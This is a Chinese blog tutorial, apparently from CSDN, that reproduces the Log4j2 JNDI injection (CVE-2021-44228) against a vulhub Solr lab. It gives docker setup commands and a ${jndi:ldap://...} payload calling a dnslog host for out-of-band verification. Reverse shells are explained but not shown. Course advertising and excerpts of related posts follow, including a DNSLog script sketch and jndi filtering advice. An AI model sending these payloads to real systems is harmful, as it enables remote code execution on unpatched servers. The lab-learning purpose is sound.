Log4j2漏洞(一)原理和dnslog验证_log4j2漏洞原理(1)

最新推荐文章于 2025-03-17 17:36:20 发布
最新推荐文章于 2025-03-17 17:36:20 发布
阅读量709 收藏 8
点赞数 14
分类专栏: 程序员 文章标签: log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_84970989/article/details/138984240
版权
2、靶场环境
2.1、环境说明

由于后面的一个漏洞利用工具【JNDI-Injection-Exploit】在编译和攻击机的jdk版本要求一致,且版本有特定要求,否则在反弹shell时不成功,因此我都使用jdk1.8.0_191,jdk其他版本这个工具我尝试过很多次都失败了,只有jdk1.8.0_191才反弹shell成功。

环境准备请参考:《kali系统下多版本JDK共存》和《kali系统安装docker和部署vulhub服务》。

2.2、启动靶场
# 先切到对应目录
cd /home/kali/vulhub-master/log4j/CVE-2021-44228

# 开启靶场
docker-compose up -d

# 查看靶场启动情况
docker-compose ps

在这里插入图片描述

2.3、访问靶场

访问:http://your-ip:8983

在这里插入图片描述

3、确定注入点

查看/vulhub-master/log4j/CVE-2021-44228下的README文件看漏洞说明

# 查看命令
cat README.zh-cn.md

# 注入点
GET /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.example.com}

在这里插入图片描述

4、dnslog验证

访问:https://dnslog.org/ ,获取子域名:83ddb152.dnslog.store

在payload后拼接上以下poc

# poc格式
${jndi:ldap://${sys:java.version}.example.com}

# poc原文,把example.com替换成dnslog子域名
${jndi:ldap://${sys:java.version}.83ddb152.dnslog.store}

# 拼接第3步骤说的路径进行访问
http://your-ip:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.83ddb152.dnslog.store}

在这里插入图片描述

然后访问:https://dnslog.org/ ,点Get Results获取结果,发现会有请求结果在列表,表示能够远程执行代码

在这里插入图片描述

5、反弹shell

反弹shell (reverse shell) 是控制端监听某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell差不多对应,本质上是网络概念的客户端与服务端的角色反转。

反弹shell通常用于被控端因防火墙受限、权限不足、端口被占用等情形。在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。

6、下期内容预告

下期将会分享log4j2漏洞复现3种反弹shell利用方式,敬请关注我的公众号:大象只为你,持续更新中…

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

份全套学习资料的朋友可以戳我获取!!**](https://bbs.youkuaiyun.com/topics/618653875)

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

Log4j2的JNDI注入漏洞原理分析与思考
uuuyy_的博客
12-23 2891
前言 最近Log4j2的JNDI注入漏洞(CVE-2021-44228)可以称之为“核弹”级别。Log4j2作为类似JDK级别的基础类库,几乎没人能够幸免。极盾科技技术总监对该漏洞进行复现分析其形成原理。在此分享。 以下涉及的代码,均在mac OS 10.14.5,JDK1.8.0_91环境下成功运行。 、 前置知识 1.1 Log4j2 Log4j2个Java日志组件,被各类Java框架广泛地使用。它的前身是Log4jLog4j2重新构建设计了框架,可以认为两者是完全独立的两个日志组
log4j RCE漏洞原理分析及检测_log4j 漏洞监测
2401_84254343的博客
04-28 363
jdk将从url指定的路径下载段字节流,并将其反序列化为Java对象,作为jndi返回。反序列化过程中,即会执行字节流中包含的程序。因此,如果攻击者能够控制日志打印的内容,就可以使目标服务器从攻击者指定的任意url地址下载代码字节流,攻击者在字节流中附带的代码就会在目标服务器上执行。那么问题来了,攻击者如何控制服务器上记录的日志内容呢?非常简单!大部分web服务程序都会对用户输入进行日志记录。
Log4j2漏洞()原理dnslog验证
02-06 2378
Log4j2漏洞()介绍漏洞前景、漏洞原理、确定注入点dnslog验证
log4j2漏洞模拟
最新发布
qq_64470109的博客
03-17 432
log4j2是Apache的个java日志框架,这个远程代码执行漏洞是由JNDI引起,JNDI其中有个look up()方法,它可以远程加载对象,如果我们在我们的服务器上构造个恶意对象让他来加载,它加载了恶意对象之后我们就可以控制它。
安全漏洞(1)-Log4j2远程代码执行漏洞log4j2漏洞验证
迷途的小兵
12-13 1万+
Log4j2远程代码执行漏洞log4j2漏洞验证
Log4j 漏洞测试
2401_84091321的博客
04-07 372
资料过多,篇幅有限,需要文中全部资料可以点击这里获取前端面试资料PDF完整版!自古成功在尝试。不尝试永远都不会成功。勇敢的尝试是成功的半。64934690)][外链图片转存中…(img-l4JiRPXK-1712464934690)]资料过多,篇幅有限,需要文中全部资料可以点击这里获取前端面试资料PDF完整版!自古成功在尝试。不尝试永远都不会成功。勇敢的尝试是成功的半。
Web网络安全-----Log4j高危漏洞原理及修复
qq_51690690的博客
07-27 1万+
Log4jlog for java(java的日志) ,是Apache的个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每条日志的输出格式;通过定义每条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过个配置文件来灵活地进行配置,而不需要修改应用的代码。提示:以下是本篇文章正文内容,下面案例可供参考。
Apache Log4j2漏洞复现
qq_62056583的博客
07-20 960
复现并分析【CVE-2021044228】Apache Log4j2 Server 反序列化命令执行漏洞,使用docker技术搭建漏洞环境,在实验环境中复现该漏洞
log4j2漏洞复现(CVE-2021-44228)
人们并不感谢罗辑
08-16 2165
log4j2个记录日志的日志记录框架,他存在漏洞的原因是因为反序列化导致的远程代码执行(rce)。在日志记录的过程中使用了JNDI接口,这个接口调用了lookup方法,可以远程加载java对象。如果没有对这个方法进行限制,攻击者可以构造恶意代码,从而使得服务器被getshell
log4j2漏洞复现
The_Epiphany的博客
04-19 468
1.该漏洞的主要成因是LDAP对外部站点资源的访问,导致下载恶意代码,可以禁止lookup的出栈查询。2.对"jndi:ladp://"、“jndi:rmi”等特征字符过滤。3.限制对外网的访问。4.配置jndi可调用协议。
漏洞研究》Apache Log4j2 远程代码执行漏洞
1
11-04 2011
Apache Log4j2 组件存在远程代码执行漏洞(CVE-2021-44228),该漏洞是由于 Apache Log4j2 某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
热门推荐
未完成的歌~的博客
03-15 1万+
Apache Log4j2个开源的 Java 日志记录工具。Log4j2Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
Log4j2漏洞分析(CVE-2021-44228)
本散修的一些学习心得与笔记,道友请自便。
09-19 1639
深入理解Log4j2漏洞&&总结与思考
log4j2漏洞分析
weixin_47623655的博客
04-11 1423
漏洞标识符为CVE-2021-44228,通常称为Log4Shell或Log4j漏洞,它存在于Log4j的JNDI查找功能中。攻击者可以通过特殊构造的请求利用此漏洞,向Log4j发送恶意请求,从而触发远程代码执行(RCE)漏洞,进而获得服务器上的完全控制权限。这个漏洞的危害非常大,由于Log4j广泛应用于各种Java应用程序中,这意味着攻击者可以利用该漏洞轻松攻击大量的目标。
log4j2漏洞
thinker
12-12 5339
这个漏洞到底是怎么回事? 怎么利用这个漏洞呢? 我看了很多技术分析文章,都太过专业,很多非Java技术栈或者不搞安全的人只能看个知半解,导致大家只能看个热闹,对这个漏洞的成因、原理、利用方式、影响面理解的不到位。 这篇文章,我尝试让所有技术相关的朋友都能看懂:这个注定会载入网络安全史册上的漏洞,到底是怎么回事! log4j2 不管是什么编程语言,不管是前端后端还是客户端,对打日志都不会陌生。 通过日志,可以帮助我们了解程序的运行情况,排查程序运行中出现的问题。 在Java技术栈中,用的比较
Log4J2漏洞(CVE-2021-44228)原理
m0_62466350的博客
05-07 3715
Apache Log4j2个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发 者可以利用该工具将程序的输入输出信息进行日志记录。20211124日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏 洞。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,导致攻击者可直接构造恶 意请求,触发远程代码执行漏洞,从而获得目标服务器权限。漏洞适应版本:2.0
log4j RCE漏洞原理分析及检测_log4j 漏洞监测(1),【步教学,步到位
weixin_58085973的博客
04-18 662
漏洞检测时,可以使用 ${jndi:ldap://http://xxx.dnslog.cn} ,如果攻击成功,目标服务器将会从 xxx.dnslog.cn 下载jndi字节流,下载之前首先得连接dnslog.cn进行xxx.dnslog.cn的域名解析,获得真实ip地址。因此,如果攻击者能够控制日志打印的内容,就可以使目标服务器从攻击者指定的任意url地址下载代码字节流,攻击者在字节流中附带的代码就会在目标服务器上执行。攻击检测后,如果发现 dnslog.cn 中刷新到了dns解析记录,就表示探测成功。
log4j2漏洞原理简述
xianyu9w的博客
04-02 6827
影响版本 Apache Log4j 2.x <= 2.14.1 jdk不知道,有知道的师傅麻烦告诉下 漏洞原理 由于Apache Log4j存在递归解析功能(lookup),未取得身份认证的用户,可以从远程发送数据请求输入数据日志,轻松触发漏洞,最终在目标上执行任意代码。 lookup相当于是个接口,具体去哪里查找,怎么查找,就需要编写具体的模块去实现了,类似于面向对象编程中多态那意思。单单lookup的话打印些服务器信息什么的危害倒是不大,但是加上JNDI就有意思了。 JNDI(Java Na
如何快速验证 Log4j2 漏洞
weixin_54960362的博客
12-24 4430
助你快速验证log4j2
dnslog
03-13
### DNSLog的工作原理 DNSLog通过利用DNS查询机制来传递信息并记录请求。当目标系统执行恶意构造的数据时,会触发向攻击者控制的域名发起DNS查询。由于每次DNS查询都会被服务器记录下来,因此可以通过查看这些日志获取到目标系统的响应情况[^1]。 具体来说,在Web安全测试或者漏洞挖掘过程中,如果存在SQL盲注或其他类型的注入点无法直接返回数据给攻击者,则可以借助于外部通道如HTTP(S)、FTP等协议;而DNS作为最基础也是最常见的网络服务之,几乎所有的防火墙都不会阻止其流量,所以成为了理想的带外通信手段[^3]。 为了使这种技术生效,通常需要满足以下几个前提条件: - 受害方能够解析指定子域名为IP地址; - 攻击者拥有个可配置CNAME/PTR记录并且能接收任意形式(A/AAAA/MX...)询问的日志平台; - 测试环境允许内部主机向外发送未经严格审查过滤过的DNS包。 旦上述要求得到满足,就可以精心设计输入字符串使得程序尝试加载来自特殊URL的内容——该链接指向由黑客掌控下的权威名称服务器所管理的个随机生成但独无二的新二级甚至多级子节点,并最终完成整个过程的信息泄露操作[^2]。 ### 实现方式 以下是基于Python脚本创建简单的DNSLog客户端服务端的例子: #### 客户端代码 (模拟受害者) ```python import socket def send_dns_query(domain_name, server_ip='8.8.8.8'): try: resolver = socket.gethostbyname_ex(domain_name)[2][0] print(f"Resolved {domain_name} to IP address: {resolver}") except Exception as e: print(e) if __name__ == "__main__": # 这里应该是个受控环境下唯且未注册过的子域名 unique_subdomain = "example.unique-subdomain.dnslog-server.com" send_dns_query(unique_subdomain) ``` 此部分代表可能存在于易受攻击应用程序内的逻辑错误或功能缺陷之处,它试图解析个不存在但实际上是由攻击者事先准备好的完全限定域名(FQDN),从而间接通知后者有关成功触发漏洞的消息。 #### 服务端代码片段(用于捕捉展示接收到的查询) 对于实际部署而言,建议采用成熟的开源项目比如`dnschef`或是商业解决方案而非自行编写简易版本,因为这涉及到复杂的事件处理循环以及高效的并发支持等问题超出了本文讨论范围[^4]. ```bash # 使用Dnsmasq设置本地DNS服务器监听所有类型请求并将它们重定向至自定义API接口保存起来供后续分析使用 dnsmasq --address=/#/127.0.0.1 --port=53 \ --dhcp-authoritative \ --log-facility=- \ --conf-file="" \ --server=/unique-subdomain.dnslog-server.com/#<Your API Endpoint Here> ``` 以上命令行参数组合指示了个轻量级却十分灵活的小工具如何充当临时性的公共根目录代理角色,负责捕获任何发往`.dnslog-server.com.`下各级分支结构体成员对象的切合法有效的查找活动。 ### 应用场景 除了辅助发现潜在的安全隐患之外,DNSLog还广泛应用于其他领域: - **社会工程学钓鱼邮件验证**:确认伪造链接是否已被点击打开过。 - **恶意软件行为监控**:跟踪样本运行期间产生的异常外部连接企图。 - **红队演练对抗训练**:评估防御体系对外部威胁感知能力的有效性及时性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值